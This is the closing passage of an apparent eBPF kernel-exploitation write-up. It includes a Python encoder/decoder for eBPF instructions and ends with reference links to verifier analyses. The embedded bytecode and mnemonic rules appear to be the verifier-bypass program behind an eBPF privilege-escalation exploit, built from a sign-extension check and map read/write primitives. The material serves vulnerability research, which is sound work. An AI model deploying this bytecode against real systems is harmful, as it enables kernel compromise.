"\x79\x08\x00\x00\x00\x00\x00\x00"
"\xbf\x02\x00\x00\x00\x00\x00\x00"
"\xb7\x00\x00\x00\x00\x00\x00\x00"
"\x55\x06\x03\x00\x00\x00\x00\x00"
"\x79\x73\x00\x00\x00\x00\x00\x00"
"\x7b\x32\x00\x00\x00\x00\x00\x00"
"\x95\x00\x00\x00\x00\x00\x00\x00"
"\x55\x06\x02\x00\x01\x00\x00\x00"
"\x7b\xa2\x00\x00\x00\x00\x00\x00"
"\x95\x00\x00\x00\x00\x00\x00\x00"
"\x7b\x87\x00\x00\x00\x00\x00\x00"
"\x95\x00\x00\x00\x00\x00\x00\x00"

'''

rules = '''
ALU_MOV_K(0,9,0x0,0xffffffff)
JMP_JNE_K(0,9,0x2,0xffffffff)
ALU64_MOV_K(0,0,0x0,0x0)
JMP_EXIT(0,0,0x0,0x0)
LD_IMM_DW(1,9,0x0,0x3)
padding
ALU64_MOV_X(9,1,0x0,0x0)
ALU64_MOV_X(10,2,0x0,0x0)
ALU64_ADD_K(0,2,0x0,0xfffffffc)
ST_MEM_W(0,10,0xfffc,0x0)
JMP_CALL(0,0,0x0,0x1)
JMP_JNE_K(0,0,0x1,0x0)
JMP_EXIT(0,0,0x0,0x0)
LDX_MEM_DW(0,6,0x0,0x0)
ALU64_MOV_X(9,1,0x0,0x0)
ALU64_MOV_X(10,2,0x0,0x0)
ALU64_ADD_K(0,2,0x0,0xfffffffc)
ST_MEM_W(0,10,0xfffc,0x1)
JMP_CALL(0,0,0x0,0x1)
JMP_JNE_K(0,0,0x1,0x0)
JMP_EXIT(0,0,0x0,0x0)
LDX_MEM_DW(0,7,0x0,0x0)
ALU64_MOV_X(9,1,0x0,0x0)
ALU64_MOV_X(10,2,0x0,0x0)
ALU64_ADD_K(0,2,0x0,0xfffffffc)
ST_MEM_W(0,10,0xfffc,0x2)
JMP_CALL(0,0,0x0,0x1)
JMP_JNE_K(0,0,0x1,0x0)
JMP_EXIT(0,0,0x0,0x0)
LDX_MEM_DW(0,8,0x0,0x0)
ALU64_MOV_X(0,2,0x0,0x0)
ALU64_MOV_K(0,0,0x0,0x0)
JMP_JNE_K(0,6,0x3,0x0)
LDX_MEM_DW(7,3,0x0,0x0)
STX_MEM_DW(3,2,0x0,0x0)
JMP_EXIT(0,0,0x0,0x0)
JMP_JNE_K(0,6,0x2,0x1)
STX_MEM_DW(10,2,0x0,0x0)
JMP_EXIT(0,0,0x0,0x0)
STX_MEM_DW(8,7,0x0,0x0)
JMP_EXIT(0,0,0x0,0x0)
'''

BPF_LD = 0x00
BPF_LDX = 0x01
BPF_ST = 0x02
BPF_STX = 0x03
BPF_ALU = 0x04
BPF_JMP = 0x05
BPF_RET = 0x06
BPF_MISC = 0x07
BPF_W = 0x00
BPF_H = 0x08
BPF_B = 0x10

BPF_IMM = 0x00
BPF_ABS = 0x20
BPF_IND = 0x40
BPF_MEM = 0x60
BPF_LEN = 0x80
BPF_MSH = 0xa0

BPF_ADD = 0x00
BPF_SUB = 0x10
BPF_MUL = 0x20
BPF_DIV = 0x30
BPF_OR = 0x40
BPF_AND = 0x50
BPF_LSH = 0x60
BPF_RSH = 0x70
BPF_NEG = 0x80
BPF_MOD = 0x90
BPF_XOR = 0xa0

BPF_JA = 0x00
BPF_JEQ = 0x10
BPF_JGT = 0x20
BPF_JGE = 0x30
BPF_JSET = 0x40
BPF_K = 0x00
BPF_X = 0x08

BPF_ALU64 = 0x07  # alu mode in double word width
BPF_DW = 0x18     # double word
BPF_XADD = 0xc0   # exclusive add
BPF_MOV = 0xb0    # mov reg to reg
BPF_ARSH = 0xc0   # sign extending arithmetic shift right
BPF_END = 0xd0    # flags for endianness conversion:
BPF_TO_LE = 0x00  # convert to little-endian
BPF_TO_BE = 0x08  # convert to big-endian
BPF_JNE = 0x50    # jump !=
BPF_JSGT = 0x60   # SGT is signed '>', GT in x86
BPF_JSGE = 0x70   # SGE is signed '>=', GE in x86
BPF_CALL = 0x80   # function call
BPF_EXIT = 0x90   # function return

opcode[BPF_ALU | BPF_ADD | BPF_X] = "ALU_ADD_X"
opcode[BPF_ALU | BPF_ADD | BPF_K] = "ALU_ADD_K"
opcode[BPF_ALU | BPF_SUB | BPF_X] = "ALU_SUB_X"
opcode[BPF_ALU | BPF_SUB | BPF_K] = "ALU_SUB_K"
opcode[BPF_ALU | BPF_AND | BPF_X] = "ALU_AND_X"
opcode[BPF_ALU | BPF_AND | BPF_K] = "ALU_AND_K"
opcode[BPF_ALU | BPF_OR | BPF_X] = "ALU_OR_X"
opcode[BPF_ALU | BPF_OR | BPF_K] = "ALU_OR_K"
opcode[BPF_ALU | BPF_LSH | BPF_X] = "ALU_LSH_X"
opcode[BPF_ALU | BPF_LSH | BPF_K] = "ALU_LSH_K"
opcode[BPF_ALU | BPF_RSH | BPF_X] = "ALU_RSH_X"
opcode[BPF_ALU | BPF_RSH | BPF_K] = "ALU_RSH_K"
opcode[BPF_ALU | BPF_XOR | BPF_X] = "ALU_XOR_X"
opcode[BPF_ALU | BPF_XOR | BPF_K] = "ALU_XOR_K"
opcode[BPF_ALU | BPF_MUL | BPF_X] = "ALU_MUL_X"
opcode[BPF_ALU | BPF_MUL | BPF_K] = "ALU_MUL_K"
opcode[BPF_ALU | BPF_MOV | BPF_X] = "ALU_MOV_X"
opcode[BPF_ALU | BPF_MOV | BPF_K] = "ALU_MOV_K"
opcode[BPF_ALU | BPF_DIV | BPF_X] = "ALU_DIV_X"
opcode[BPF_ALU | BPF_DIV | BPF_K] = "ALU_DIV_K"
opcode[BPF_ALU | BPF_MOD | BPF_X] = "ALU_MOD_X"
opcode[BPF_ALU | BPF_MOD | BPF_K] = "ALU_MOD_K"
opcode[BPF_ALU | BPF_NEG] = "ALU_NEG"
opcode[BPF_ALU | BPF_END | BPF_TO_BE] = "ALU_END_TO_BE"
opcode[BPF_ALU | BPF_END | BPF_TO_LE] = "ALU_END_TO_LE"
# 64 bit ALU operations
opcode[BPF_ALU64 | BPF_ADD | BPF_X] = "ALU64_ADD_X"
opcode[BPF_ALU64 | BPF_ADD | BPF_K] = "ALU64_ADD_K"
opcode[BPF_ALU64 | BPF_SUB | BPF_X] = "ALU64_SUB_X"
opcode[BPF_ALU64 | BPF_SUB | BPF_K] = "ALU64_SUB_K"
opcode[BPF_ALU64 | BPF_AND | BPF_X] = "ALU64_AND_X"
opcode[BPF_ALU64 | BPF_AND | BPF_K] = "ALU64_AND_K"
opcode[BPF_ALU64 | BPF_OR | BPF_X] = "ALU64_OR_X"
opcode[BPF_ALU64 | BPF_OR | BPF_K] = "ALU64_OR_K"
opcode[BPF_ALU64 | BPF_LSH | BPF_X] = "ALU64_LSH_X"
opcode[BPF_ALU64 | BPF_LSH | BPF_K] = "ALU64_LSH_K"
opcode[BPF_ALU64 | BPF_RSH | BPF_X] = "ALU64_RSH_X"
opcode[BPF_ALU64 | BPF_RSH | BPF_K] = "ALU64_RSH_K"
opcode[BPF_ALU64 | BPF_XOR | BPF_X] = "ALU64_XOR_X"
opcode[BPF_ALU64 | BPF_XOR | BPF_K] = "ALU64_XOR_K"
opcode[BPF_ALU64 | BPF_MUL | BPF_X] = "ALU64_MUL_X"
opcode[BPF_ALU64 | BPF_MUL | BPF_K] = "ALU64_MUL_K"
opcode[BPF_ALU64 | BPF_MOV | BPF_X] = "ALU64_MOV_X"
opcode[BPF_ALU64 | BPF_MOV | BPF_K] = "ALU64_MOV_K"
opcode[BPF_ALU64 | BPF_ARSH | BPF_X] = "ALU64_ARSH_X"
opcode[BPF_ALU64 | BPF_ARSH | BPF_K] = "ALU64_ARSH_K"
opcode[BPF_ALU64 | BPF_DIV | BPF_X] = "ALU64_DIV_X"
opcode[BPF_ALU64 | BPF_DIV | BPF_K] = "ALU64_DIV_K"
opcode[BPF_ALU64 | BPF_MOD | BPF_X] = "ALU64_MOD_X"
opcode[BPF_ALU64 | BPF_MOD | BPF_K] = "ALU64_MOD_K"
opcode[BPF_ALU64 | BPF_NEG] = "ALU64_NEG"
# Call instruction
opcode[BPF_JMP | BPF_CALL] = "JMP_CALL"
opcode[BPF_JMP | BPF_CALL | BPF_X] = "JMP_TAIL_CALL"
# Jumps
opcode[BPF_JMP | BPF_JA] = "JMP_JA"
opcode[BPF_JMP | BPF_JEQ | BPF_X] = "JMP_JEQ_X"
opcode[BPF_JMP | BPF_JEQ | BPF_K] = "JMP_JEQ_K"
opcode[BPF_JMP | BPF_JNE | BPF_X] = "JMP_JNE_X"
opcode[BPF_JMP | BPF_JNE | BPF_K] = "JMP_JNE_K"
opcode[BPF_JMP | BPF_JGT | BPF_X] = "JMP_JGT_X"
opcode[BPF_JMP | BPF_JGT | BPF_K] = "JMP_JGT_K"
opcode[BPF_JMP | BPF_JGE | BPF_X] = "JMP_JGE_X"
opcode[BPF_JMP | BPF_JGE | BPF_K] = "JMP_JGE_K"
opcode[BPF_JMP | BPF_JSGT | BPF_X] = "JMP_JSGT_X"
opcode[BPF_JMP | BPF_JSGT | BPF_K] = "JMP_JSGT_K"
opcode[BPF_JMP | BPF_JSGE | BPF_X] = "JMP_JSGE_X"
opcode[BPF_JMP | BPF_JSGE | BPF_K] = "JMP_JSGE_K"
opcode[BPF_JMP | BPF_JSET | BPF_X] = "JMP_JSET_X"
opcode[BPF_JMP | BPF_JSET | BPF_K] = "JMP_JSET_K"
# Program return
opcode[BPF_JMP | BPF_EXIT] = "JMP_EXIT"
# Store instructions
opcode[BPF_STX | BPF_MEM | BPF_B] = "STX_MEM_B"
opcode[BPF_STX | BPF_MEM | BPF_H] = "STX_MEM_H"
opcode[BPF_STX | BPF_MEM | BPF_W] = "STX_MEM_W"
opcode[BPF_STX | BPF_MEM | BPF_DW] = "STX_MEM_DW"
opcode[BPF_STX | BPF_XADD | BPF_W] = "STX_XADD_W"
opcode[BPF_STX | BPF_XADD | BPF_DW] = "STX_XADD_DW"
opcode[BPF_ST | BPF_MEM | BPF_B] = "ST_MEM_B"
opcode[BPF_ST | BPF_MEM | BPF_H] = "ST_MEM_H"
opcode[BPF_ST | BPF_MEM | BPF_W] = "ST_MEM_W"
opcode[BPF_ST | BPF_MEM | BPF_DW] = "ST_MEM_DW"
# Load instructions
opcode[BPF_LDX | BPF_MEM | BPF_B] = "LDX_MEM_B"
opcode[BPF_LDX | BPF_MEM | BPF_H] = "LDX_MEM_H"
opcode[BPF_LDX | BPF_MEM | BPF_W] = "LDX_MEM_W"
opcode[BPF_LDX | BPF_MEM | BPF_DW] = "LDX_MEM_DW"
opcode[BPF_LD | BPF_ABS | BPF_W] = "LD_ABS_W"
opcode[BPF_LD | BPF_ABS | BPF_H] = "LD_ABS_H"
opcode[BPF_LD | BPF_ABS | BPF_B] = "LD_ABS_B"
opcode[BPF_LD | BPF_IND | BPF_W] = "LD_IND_W"
opcode[BPF_LD | BPF_IND | BPF_H] = "LD_IND_H"
opcode[BPF_LD | BPF_IND | BPF_B] = "LD_IND_B"
opcode[BPF_LD | BPF_IMM | BPF_DW] = "LD_IMM_DW"


def u16(imm):
    if len(imm) != 2:
        print('[-] u16 must have a correct input like "\\x12\\x34"')
        sys.exit()
    return (ord(imm[1]) << 8) + ord(imm[0])


def u32(imm):
    if len(imm) != 4:
        print('[-] u32 must have a correct input like "\\x12\\x34\\x56\\x78"')
        sys.exit()
    return ord(imm[0]) + (ord(imm[1]) << 8) + (ord(imm[2]) << 16) + (ord(imm[3]) << 24)


def p16(imm):
    result = ''
    for i in range(2):
        result += "\\x" + hex((imm >> (8 * i)) & 0xff).replace('0x', '').rjust(2, '0')
    return result


def p32(imm):
    result = ''
    for i in range(4):
        result += "\\x" + hex((imm >> (8 * i)) & 0xff).replace('0x', '').rjust(2, '0')
    return result


def decode_single(idx, insn):
    # insn is one 8-byte instruction: code, src:4|dst:4, off (le16), imm (le32)
    op = opcode[ord(insn[0])]
    reg = ord(insn[1])
    off = insn[2:4]
    imm = insn[4:]
    if op == 'invalid opcode':
        print('[%d]: maybe padding' % idx)
        return
    print("[%d]: %s(%s,%s,%s,%s)" % (idx, op, str(reg >> 4), str(reg & 0x0f),
                                     hex(u16(off)), hex(u32(imm))))


def decode_all(insn_tmp):
    insn = insn_tmp.split('"\n')
    i = 0
    for ins in insn:
        # Strip only leading whitespace (the newline left by split);
        # trailing instruction bytes may themselves look like whitespace.
        ins = ins.lstrip()
        if len(ins) < 9:
            break
        if ins[-9] != '"':
            print('[-] format error!')
            sys.exit()
        decode_single(i, ins[-8:])
        i += 1


def banner_decode():
    print('[+] A tools for decode ebpf rules by P4nda')
    print('[+] modify code in script as format :')
    print('=========================================================')
    print('\t\t"\\xbf\\xa2\\x00\\x00\\x00\\x00\\x00\\x00"')
    print('\t\t"\\x07\\x02\\x00\\x00\\xfc\\xff\\xff\\xff"')
    print('\t\t"\\xbf\\xa2\\x00\\x00\\x00\\x00\\x00\\x00"')
    print('\t\t"\\x07\\x02\\x00\\x00\\xfc\\xff\\xff\\xff"')
    print('\t\t"\\xbf\\xa2\\x00\\x00\\x00\\x00\\x00\\x00"')
    print('\t\t"\\x07\\x02\\x00\\x00\\xfc\\xff\\xff\\xff"')
    print('=========================================================')
    print('result format: \t[index]: opcode(src,dst,off,imm)')
    print('================= result ================================')


def str2int(input):
    input = input.strip()
    if input.startswith('0x'):
        return int(input, 16)
    return int(input)


def char2hex(input):
    return '\\x' + hex(input).replace('0x', '').rjust(2, '0')


def encode_single(rl):
    rl = rl.strip()
    result = ''
    if '(' not in rl or ')' not in rl:
        if 'padding' in rl:
            print('\t"%s"' % ('\\x00' * 8))
            return
        else:
            print('[-] bad rules ')
            sys.exit(-1)
    op = rl.split('(')[0]
    # "OP(src,dst,off,imm)" -> ["src", "dst", "off", "imm"]
    args = rl.split('(')[1].split(')')[0].split(',')
    src = str2int(args[0])
    dst = str2int(args[1])
    off = str2int(args[2])
    imm = str2int(args[3])
    for i in range(256):
        if op.upper() == opcode[i]:
            result += char2hex(i)
            break
    if len(result) == 0:
        print('[-] No such insn :', op)
        sys.exit(-1)
    result += char2hex((src << 4) + dst)
    result += p16(off)
    result += p32(imm)
    print('\t"%s"' % result)


def encode_all(rules):
    for rl in rules.split('\n'):
        if 'padding' in rl or ('(' in rl and ')' in rl):
            encode_single(rl)


def banner_encode():
    print('[+] A tools for encode ebpf rules by P4nda')
    print('[+] modify code in script as format :')
    print('=========================================================')
    print('\t\t ALU_MOV_K(0,9,0x0,0xffffffff)')
    print('\t\t JMP_JNE_K(0,9,0x2,0xffffffff)')
    print('\t\t ALU64_MOV_K(0,0,0x0,0x0)')
    print('\t\t LD_IMM_DW(1,9,0x0,0x3)')
    print('\t\t padding \t/*this word will be translated into \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00*/')
    print('\t\t JMP_EXIT(0,0,0x0,0x0)')
    print('=========================================================')
    print('result format: \t"\\x07\\x02\\x00\\x00\\xfc\\xff\\xff\\xff"')
    print('================= result ================================')


def banner():
    print('[+] A tools for encode&decode ebpf rules by P4nda')
    print('[+] modify code in script yourself ,function argv as follow:')
    print('=========================================================')
    print('encode:')
    print('\tebpf_tools.py encode ')
    print('decode:')
    print('\tebpf_tools.py decode ')
    print('=========================================================')


if __name__ == '__main__':
    if len(sys.argv) == 1:
        banner()
        sys.exit(0)
    if sys.argv[1].lower() == 'decode':
        banner_decode()
        decode_all(code)
    elif sys.argv[1].lower() == 'encode':
        banner_encode()
        encode_all(rules)
    else:
        banner()

References

[1] https://security.tencent.com/index.php/blog/msg/124

[2] https://www.ibm.com/developerworks/cn/linux/l-lo-eBPF-history/index.html

[3] https://www.jianshu.com/p/75b368f85dc6

[4] https://cert.360.cn/report/detail?id=ff28fc8d8cb2b72148c9237612933c11

[5] https://xz.aliyun.com/t/2212

[6] https://blog.csdn.net/qq_14978113/article/details/80488711

[7] https://elixir.bootlin.com/linux/v4.4.110/source/kernel/bpf/syscall.c

[8] https://elixir.bootlin.com/linux/v4.4.110/source/kernel/bpf/verifier.c

[9] https://elixir.bootlin.com/linux/v4.4.110/source/kernel/bpf/core.c
